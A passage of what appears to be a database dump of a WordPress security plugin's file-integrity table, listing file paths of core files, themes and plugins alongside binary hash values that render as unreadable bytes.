6�[��>��p1���','T�`z�v�3(Ӆi\\��mr��X�p�\\�i��f','',0,'?'),('҆��X�o#R����','wp-content/themes/fluida/content/author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ab�t����:�֩λ$','�uc,Ȩ���������+�Ѩ�.����','',0,'?'),('Җ6���M֦��5wH�','wp-content/plugins/wordfence/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�Zqf���@1cR�A','d%�ZAp�N��q�ϲ<|$����\Z����o���n','',0,'?'),('Ҟ���ǟ�	Ks���','wp-includes/images/icon-pointer-flag-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�b��&�Z�r','4���Bȥ��\'x+c�h�ҠVn�5�I�>�j��','',0,'?'),('Ҫ*���H���\n;t��','wp-admin/includes/ajax-actions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�3�;�8Mµb��@','\"�5��y7�_�;���	6[��<#qM�=�[ɮ�','',0,'?'),('ҭ�_VlK�g�!p�1','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oҡu�/B�&?�h��','�Dٽ.�j7It�l�KD�pC���O���Уh�\n','',0,'?'),('ҲE5|�ѵ�C�d闼','wp-admin/options-reading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�\"H�$V���j��','Ǝͱ�e\Z�����N�hԊ_���.����A','',0,'?'),('��?:�ԋ�W9��C�','wp-content/themes/barletta/css/bootstrap.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']SW�7��:[�Ү�B','z��ܓ=�gRȯu�*2�����oO:i`\n�̀X','',0,'?'),('����l����.�d��','wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-featured-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*%���P��F廁w','��Iڀ~�t�����X������ a��X0\n(','',0,'?'),('��Lt593�u^���)��','wp-admin/images/comment-grey-bubble-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TY�ŝ2�s,\r�m��','D��x���T-����w��N�	��P�{��','',0,'?'),('���J���K<V\\�|','wp-content/themes/sg-window/inc/widget-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��84�w�խ9�','�dӃ�Nݭ8���4B���+]&�6!��m[�','',0,'?'),('�쫖��N�����i%�D','wp-content/plugins/unyson/framework/includes/option-types/radio-text/static/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$���Ԛa�F�[��','�yÿ �%�[���ZIr9uєQ�N����u','',0,'?'),('�w�]cI�w��Ȱ�H','wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���蛻�0�ե�J9�','�V�j݈��o��ȟ{\'7�Úع�����','',0,'?'),('��΋So�� �HK�','wp-content/plugins/unyson/framework/static/libs/unycon/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�ۿ z����0L�u4�','x6�@�\n�qv�dR>��{�8^�_��pQ','',0,'?'),('���Kݓs��i9	��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/class-fw-shortcode-table.php',0,'Ѯ�3�!xu�(�5��&','Ѯ�3�!xu�(�5��&','R88lyd����,�}����e?��qy�NW/N','',0,'?'),('�1���+9ᵶ���','wp-content/plugins/spam-captcha/todo.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʾc7����H�ncwq','�\0qj{�~���ΞK���y�t ����Q�%2','',0,'?'),('�-���2�,{L�V','wp-content/themes/nirvana/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X����26�T��7','!���E�g�I�O\\͛c���\nх[᪐�;2�','',0,'?'),('�A��!�\0\n�4�+��','wp-content/themes/fluida/admin/images/logo-about-customize.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��$Pb� ܷ~�','&� �����v���h.�/2�D0ʢ��f�s�#','',0,'?'),('�AALn�|[:��?�N@�','wp-content/themes/hueman/assets/czr/css/customizer-czr-text-editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ɛ�0c�	:O��','�l$�Y��s+��=O\\�g$�53��l\r��re�','',0,'?'),('�E#l��L��_&ܪ���','wp-admin/images/arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�$�>����>�Y','�YW��(��N3�2U;�����<.iDd!��','',0,'?'),('�GР\'�鶐���~K�','wp-content/themes/the-minimal/inc/widget-recent-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G�����-�ΰ�','pSWu����ԍwjsW���Q�\0�8�A�|Xw','',0,'?'),('�H �%9���l�ԅ�E','wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�O�I�����Iԥ{','9YZ��A}7�=��:�\'Fo�G�\'�R�ɹ�_-','',0,'?'),('�U��n�/|r@ڪ��','wp-content/wflogs/config.php',0,'�e&��D�,Ҿ��D9�	','�e&��D�,Ҿ��D9�	','0U��R�:bˈ璠\rdeey�w\ru�AY�W>\"�','',0,'?'),('�[�:�S���h	˸�','wp-content/themes/twentynineteen/sass/navigation/_menu-social-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']<1����!\0�o��','#@^�=}l5�@���W���sa�	#a� ��V','',0,'?'),('�]�R%�S՞��@','wp-content/themes/clean-magazine/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����V����','Y��g�@Qv���%�\">F:j�n;�s�k�','',0,'?'),('�ib#7��J���t��0','wp-content/themes/mh-magazine-lite/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ߩ\0���!Gs\Z|N','��;�2J\\��uVw��G�����=C\'�G','',0,'?'),('�js��w2��p��qS','wp-content/plugins/wordfence/lib/wfIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��A��a�<�ά','�9ti?L\r���E��-,�*���<�a\\=�i�a','',0,'?'),('�p2.dqVUSaC�K�s','wp-content/themes/travelify/templates/template-blog-large-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�RkȯS�z�_����','`m:[q)�+��8�At�$y�.\'�\0�~��\n6�','',0,'?'),('�s}�Ƕ�)�T�V��','wp-includes/blocks/nextpage/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W����7Q��)*��','4�_�����0��2-���amj^�B��Y��','',0,'?'),('�{ڭd3T�Xy����7;','wp-includes/css/admin-bar-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mkB6�BR|��b�1�(','��U���J��n�P\'�=vI��\\f�{�p','',0,'?'),('�}��e��C��!�*','wp-includes/js/codemirror/codemirror.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	�f��h�;f�q�','�u�*�Q�6�Ƅ�d�vdȇ�_���\0�����','',0,'?'),('Ӂ�l-��y4Ngp0','wp-content/themes/twentytwentyone/template-parts/content/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;9��2;��0S��','�։��L`Aǵ?�s,��K���w�ʨ��8T�','',0,'?'),('ӂ>$؞�yi��4č','wp-content/themes/sg-window/languages/sg-window.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R̩ݾ~ر4���f�Q9','r�TE�=�̭{� ��U��%݂߲�DգV+�','',0,'?'),('ӊmel�s�oYc��','wp-content/plugins/wordpress-seo/admin/class-recalculate-scores.php',0,'�\0��8ށ�>[E	K��B','�\0��8ށ�>[E	K��B','�ո�74E�~8�knx ���� ���ʔ��b','',0,'?'),('ӕ����\n��t�0','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mpG���aB��NX>��(','%�-*Ψ6F��i�\rWϹ�M׽�WI���:�v�D','',0,'?'),('ӗ���;��^�b�窫P','wp-content/themes/nirvana/fonts/ubuntu-r-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}lM�R\0g�\"<`��;S','���:᭪��&�,cv�%{ij9=�x��G���','',0,'?'),('Ӝ�������|0mC','wp-content/themes/fabulous-fluid/css/jcf.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Zx�)f�&�fAz�','�X�!��g�Xį�(�ɺ�.h�86��','',0,'?'),('ӟ���my�+\nf�:','wp-includes/js/wp-api.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�ϩx.�@���� ','�eU\"O�8�W���|����v�����\'����~)','',0,'?'),('Ӱ�@p���� 5x�P','wp-content/themes/twentynineteen/sass/mixins/_mixins-master.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��;��MS�\nQd�ڇ','&жd�I�I��2�8!�.!�е�̼���u�','',0,'?'),('ӱb�\"�) 1T5 �7�','wp-content/plugins/spam-captcha/core/lang/SL_framework-de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���հ�Z[�m���A{','�K�cSF��H�$�[�!��?�@�������ɣ�','',0,'?'),('Ӳ�\' �Y�΋�','wp-content/themes/vega/assets/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���v넚E�ǐ�;��','�&�zB]<���\"d�5z�y�;{�-6<�C	','',0,'?'),('ӳ:�\nu��B�j���','wp-content/themes/morfeu/assets/js/scripts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0|���f�=\r��b�','��hy!mD[h(��̷�i��A렽NQ@!߻}�','',0,'?'),('ӽGs����{e�=�','wp-content/themes/precious-lite/images/h1_buy_bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�<K\n�>��y','[�{�ƴZ�����ć�\'�E���k�7�','',0,'?'),('��}t��*�/��㋪','wp-content/themes/nirvana/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H��̈�֓E���v','?��⠛`�<��~�卶�P����!B�U�}��','',0,'?'),('��>Zb�o&����','wp-content/plugins/akismet/views/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ܥ&F�e@`','ۑ�&\Z錷�ې7�~�����rb�','',0,'?'),('��I7߇S�2�&���','wp-admin/erase-personal-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�rB�6��έg���','Z�������oI�A�Qʷ��<r�Cǔ<�9�Bi','',0,'?'),('��K��7ڋ����+','wp-content/themes/sg-window/img/0.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+ٴ	?������','bz#���ht�7Z���}S�u`�Ł��/','',0,'?'),('�A�J����\Z�UIFː','wp-content/themes/hueman/assets/czr/css/customizer-czr-text-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�c�w�q���4�@','*+��X��&����a�\Z��.�m�Z<�f','',0,'?'),('�����0*�W��','wp-content/plugins/index.php',0,'gD,V�=\\�bP','gD,V�=\\�bP','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�\r�����@���3�','wp-content/themes/accelerate/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|��i�qD!\rt��o','>�}�#Yܖf�dQ�U��/h�\n������̎','',0,'?'),('���N~Q�5~L�J��','wp-content/plugins/spam-captcha/core/img/arrow_down_s.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�J\Zk,s�r��Ќ','K`�Xڼ\\0�pN�5C�l2coL(L����^�)�','',0,'?'),('�B|�^�=҅t����','wp-content/themes/mh-magazine-lite/includes/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��`G��7?O�V9ȿ','k�ս�e+�2@l�\Zu��rL��G0���s6A','',0,'?'),('�D��7����\Za�','wp-content/plugins/spam-captcha/img/banner-1544x500.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':���84�I���v��','=Xy�~p4_� 9\0b�j�%��+�eZi���','',0,'?'),('�J����|\n�b㓅a','wp-content/themes/twentyseventeen/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D��Ȋs��Oq��2','��Ajn\n���r�قi7˯@\"C��-\'��(p�o�','',0,'?'),('�K���V8ƈ�G �','wp-content/plugins/unyson/framework/includes/option-types/multi-select/class-fw-option-type-multi-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�͖ķ��\nhpE�p','�����}w5A�?KH����h��p��MP���','',0,'?'),('�Mֈ�:�^�i�>��E','wp-content/themes/fabulous-fluid/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M~V{���X��]�lr','��_c5��yKM��b&�$�tx�����	��','',0,'?'),('�W\ZeC���Du�','wp-content/plugins/wordpress-seo/frontend/class-twitter.php',0,'��p^��&����W��','��p^��&����W��','7������Rb뇘�Z�D� �$|;M$q��','',0,'?'),('�].�oo�ȦM-n	�','wp-admin/images/align-none-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�XC�)[���-�4�','�ߧ&QQ�p\"~�\Z8S׊����Y����S`','',0,'?'),('�^����\\�+z4�B��s','wp-content/themes/morfeu/assets/js/polyfill/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ި஄UPb��t�<','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('�b����ϡ�k�5�I|k','wp-content/themes/nirvana/tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b&[6�C�U�!��T�','�&�f�4V�>�I�P�ugC*Y��-�\'����','',0,'?'),('�d�6�|�i�e\Z=9�\Z','wp-content/themes/wen-business/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Β�����Y�&�ӗ','{|؍�`%̴=%f���<W�X���qߨ���','',0,'?'),('�l�.�}+�S�c�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-footer-content.php',0,'�iD\r�ߛ��E[S�','�iD\r�ߛ��E[S�','�n��Wp2L�|n���9v��^&\\(�Q��hI','',0,'?'),('�y8��W�N9VӨ','wp-content/plugins/all-in-one-wp-migration/lib/view/main/storage-path-notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�T�d��K?L���r','�<vom{��l�	\ni�L�E�oW������','',0,'?'),('�}��V���_����','wp-content/themes/alpha-store/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�Y����r�d','���~	+6�����bFf��9hPρ���,��','',0,'?'),('Ԇч�ީ���WWldR','wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-onpage-ajax.php',0,'(�W�S��aw�sG�','(�W�S��aw�sG�','\0�&I�`{Ң�#�õ,Ib����N��_����','',0,'?'),('ԛ�a�����tr��','wp-includes/blocks/video/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	X���C��~��A�A','�z�p�t�d?܏v�1\"��C�9FE���^�','',0,'?'),('ԛ��cŀ`�TX�J�W','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.jp.php',0,'<�����ԑ�p�\"(','<�����ԑ�p�\"(','$���`��Q\Zu�|���\\f5\"+(F��]�����','',0,'?'),('Ԝ|�w�����6�/��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/th.js',0,'��L�D���ZU`YK�D�','��L�D���ZU`YK�D�','�����ߣ���Oj���\r�,�u)�ɸ�{�','',0,'?'),('Ԡ��x�T��FXqO�','wp-content/themes/hueman/option-tree/assets/js/ot-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E8U��J�}�.�%w_�','�Ҁ���)�,�1�w$� ���hQ�a�����','',0,'?'),('ԫ��є�P4����>��','wp-content/themes/the-minimal/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']4e#��\\�-���!�B','Lb|�1���֟]xv�Ӛ�&u���^�����\\','',0,'?'),('Ծq�Q�ΦZ��jx','wp-content/themes/fluida/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ğ����������6�','���Fk��)(�:�H\n<aϿ�\Z)�Ye','',0,'?'),('�Ȇp���]4��L��q�','wp-includes/css/admin-bar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*��\0A���IԧwH�','�3b<�\ZYM~����|<wg��,�G!�|:��+','',0,'?'),('��p��S��`�]T]D�','wp-includes/css/dashicons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',J��/��n�R�~�','qԡ���c��q�l5/�3$˝T�GW�','',0,'?'),('�̆lҘ�\\�4�,C-�m','wp-includes/css/dist/block-library/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ba\0z���w�l:�','��]O;��Q2P�!<8E{G���l�G9��|','',0,'?'),('����*?M)����{9{','wp-content/themes/supernews/assets/library/bxslider/js/jquery.bxslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�R?.�\r�4QA�','�C�5�*]�ە���tw�Z�\ng�=8X���','',0,'?'),('��K팾���A�����','wp-content/themes/illdy/inc/customizer/panels/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D>��wz�,�nX�','s��\n\r̖��}���iy�M_�O1C�3�$','',0,'?'),('�ꪜh��ЕY�^�','wp-content/themes/twentyseventeen/README.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Y�-��5�','��N��[�s�<Ď)�� �Z��9QB������','',0,'?'),('��g�{-T�`�< �','wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-b2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nA\r����F�H�T��','D�����\r����\0�3�=�q�.���!�]�u[F�','',0,'?'),('�������L��t��u','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.fi.php',0,'\n]��b�K\0��w�Yn~','\n]��b�K\0��w�Yn~','��� =�7G��5��X-\nGலj�`�;)$8�n','',0,'?'),('�7 ��x��Pl��\n�','wp-content/plugins/spam-captcha/core/data/framework.info',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ξ�k������0ο�',' >��S�!4�<�|��K1uidvq�Șs�I','',0,'?'),('���/�q��RR�|���','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R���!z@;�Ve����','�#��l�#�к;�	KAH9Q�@�	����B~�','',0,'?'),('������IE��','wp-content/themes/sg-window/img/icons/small/livejournal.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ʡ��\r��\"E��','���>T\0S=�L.E��?����%���k��','',0,'?'),('�X��$�a��B��^','wp-admin/js/user-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѝ̢����VN3����','cm[Tl5����Qy;��w0��N!<��/躬�','',0,'?'),('���Vx�-��ȴ`w�','wp-content/plugins/unyson/framework/extensions/analytics/class-fw-extension-analytics.php',0,'\\|���jőQe�d��','\\|���jőQe�d��','�^�&�w�K������\n�D�fy�=ן{�1l�','',0,'?'),('�#:B2Ju����l�','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.ro.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��\'��ߘ��)��','��ap=��2�b�H\"�7�yOማFO��','',0,'?'),('�%f��G���Pѣ��','wp-content/themes/twentytwenty/singular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9�&)e�k�i','�^��~��1o�U���K�����?[�*����','',0,'?'),('�+�U�7cHj��r','wp-content/themes/fabulous-fluid/images/grid-img3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$]�B\'M�-鯥��2','��� N�O>����3�,�������b','',0,'?'),('�5���%���xTT�','wp-content/themes/alpha-store/lib/plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�����@��Ӥ','��`db�bD��-��c��G }����','',0,'?'),('�9�׊- [�|��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.be.php',0,'a�#�uc^�2R�zcuf','a�#�uc^�2R�zcuf','����N�hr�\ZW�.�Dr�o�8ĭ��|YX�','',0,'?'),('�BImS��96�7���X','wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�G�M�!ex9��','�!ZgbZ��FZ���z����|�YE�	���','',0,'?'),('�Bg�Lհ�5ǩ9�','wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oɘ�3�&;�� ','G�+O����=#4��>��� �񕸅','',0,'?'),('�G�h˲�;��\'ݷ�/','wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j|�ZY����P','���:.P��BIP��i�l�� 9h��� �j�	','',0,'?'),('�gֿ��m�㋣��I','wp-includes/js/dist/data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��l�޷UGk^����P','�|^(F��*mL\rH-�֯��`\"����Q$N�g','',0,'?'),('�p�sZZ�#�N7��e�','wp-includes/css/dist/block-editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�&xL�8���j����','�T��*3�\Z�?����`����IF}Xf�3�','',0,'?'),('�uG#�)�|�^���6','wp-includes/Requests/Exception/HTTP/511.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','un�N<Kw�Л����@','��I��}7+ƕ�A���l欿B��t�\'s��t','',0,'?'),('ՁfOڸ�(��̐Ǐ�K','wp-content/themes/aqueduct/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q��)�U��$H�֢','e�)�3W1	[�+Ƈ��@���Z�\r�kY��','',0,'?'),('Մ����\nmOoٮ&��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.rrpproxy.php',0,'�-�S��dH��P��','�-�S��dH��P��','�Ň+�QZ[��R����t�����~k��86��','',0,'?'),('Ջ���ָ^Rj��ś','wp-content/themes/sg-window/page-templates/right-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��day���n�Q�','k���N����%���~��DQ�5�	�u�U�� ','',0,'?'),('ժV�L�6��\n����','wp-content/themes/supernews/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|vZ�Œcw��ʓJu','�ÞC� ��NX!��;\"��+��S�1��+��Z�','',0,'?'),('հ\'2�tSK߶0g�','wp-content/themes/point/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p3�K���}��!',';ݽ��u�Ӡx���/M5�6�\\N풋���','',0,'?'),('հRN�fxn�c[�tP','wp-content/plugins/unyson/framework/extensions/shortcodes/extensions/wp-shortcodes/class-fw-extension-wp-shortcodes.php',0,'�\'3u4��ĨʮK�\":','�\'3u4��ĨʮK�\":','�mA[[�cHV��^��R\"��B�hlS#��','',0,'?'),('ջO�sU���ȶTПa','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/archives.php',0,'w��-׉�x;�̮|R]�','w��-׉�x;�̮|R]�','x����U�NST��#����-���XVܳ9LO�','',0,'?'),('����\0�̪		��V%','wp-content/plugins/unyson/framework/includes/option-types/icon-v2/static/img/no-image.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'K_��l\'n����Pd','�/g�n��\r�G�����l,*u?��e��D��:�3','',0,'?'),('���)�BZ�IŐ��Ra','wp-content/themes/hueman/assets/admin/img/col-3cm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����I*[]�e���n�',']��^�/|L|�Ʋ���KXuN4���~7�\'�','',0,'?'),('���.��r���-&���','wp-content/themes/alpha-store/sidebar-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��GA���k �\"�','1�X\n����#�\Z��r}h\n2lx���','',0,'?'),('�K2;�<D����kub','wp-content/plugins/wordfence/lib/wfStyle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���1_�e�k2R����','j�颎����_c�632�3օ�]Gs}.\n','',0,'?'),('���ͤ6�\0/��k���','wp-includes/js/imgareaselect/jquery.imgareaselect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�M��~�M��ν磰','��.\\��R�x$A�^G֟�?l�a.�:	w���','',0,'?'),('�����:��58�V','wp-content/plugins/unyson/framework/extensions/analytics/helpers.php',0,'�K��9�P��V�c�A','�K��9�P��V�c�A','�V���Qn����O�\Z𿻣Sخ�(җ+�','',0,'?'),('�	����AR�Z\Z��','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-renderer.php',0,'W�r�#�� _\\����3�','W�r�#�� _\\����3�','���-�\Z���)���F�WD		�	��I\n��','',0,'?'),('�!V������<k�,o�','wp-content/themes/sg-window/functions.php',0,'�w�Q}w��\r_�B}','�w�Q}w��\r_�B}',']�=�oԩ�\r���;�}����-��>%���.�{!','',0,'?'),('�&ax���\"�GT�_~��','wp-content/themes/square/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�X�k*uW�','�]#��-w[�p\r[��ؙG�֣}��Y��?a��:','',0,'?'),('�\'h�t.HP~��j�','wp-content/themes/travelify/content-nosidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�u�g�X�k�}�',')\"�_�&e�q�\nI���n�M��$�����s�','',0,'?'),('�B�*J��(X8N�','wp-content/themes/alpha-store/template-parts/template-part-posttags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W`e;��}�h[��','e�h�A�\n�XD\'|���^�$��u�y̓#\Z���','',0,'?'),('�GJm-�ϳ$52+�Xb*','wp-content/themes/precious-lite/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� S�\n�8���\\��','����u�;k-�ߐ�����e�5@�hfGh�','',0,'?'),('�Nk�,��.���-c��','wp-content/themes/hueman/functions/class-utils-settings-map.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V;�7�;m�_�b(�','#AͧX�H�*�Ͳ\06�q�՝D+@p����','',0,'?'),('�Xډ|�8���}�B�','wp-includes/js/tinymce/plugins/link/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V\\\n]��K�s\'�','\Z�>��I�S�е�����v�,��q�U����^','',0,'?'),('�Z�	r!ޏf���	�','wp-includes/images/icon-pointer-flag.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,���E^�j`\'','oq��9��a{)h}=#�����T�ק��','',0,'?'),('�oҨ*K��o�7{� <','wp-includes/ID3/module.audio-video.matroska.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^w�\'Z��Do4d].�','bA�O����C���r5Y\0��se�A�ʏ0���','',0,'?'),('�rY�S�xwDY˚J�[','wp-includes/images/media/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R׬˂���ôʼnh�H','{�� [K��\0!�긽��/�\\�lw.����','',0,'?'),('�u�Wl�F;i��5�2�','wp-content/themes/sg-window/publication/functions.php',0,'���ޣa�p�.fC\\\ZW','���ޣa�p�.fC\\\ZW','e�\ny~P\Z�ܯ@<1���[k��!ni~o��','',0,'?'),('֋�8�[�����0�ʊ','wp-content/plugins/wordfence/views/waf/debug.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ɖ9�/Y������','[γ�s	`�A���;�y_���<��X�\Z�%Y�','',0,'?'),('֋��]��S��,c�','wp-content/themes/square/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��d�1~�\r�_���-�','��y�2�*�1\ZѢo���m���CNC���&','',0,'?'),('֌��q�ó�X�[���','wp-includes/class-wp-feed-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��ط?h\"��%c��(\0','lh�>��6�<Z,2��1*!�cm;z~��܏�4��','',0,'?'),('֑�U+]���y��*','wp-content/themes/fluida/resources/fonts/socials.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�\n���B����','�:hdۅ��\Z‰��zEN�Z>G5�z�\'JT��','',0,'?'),('ֶ��9؞f�po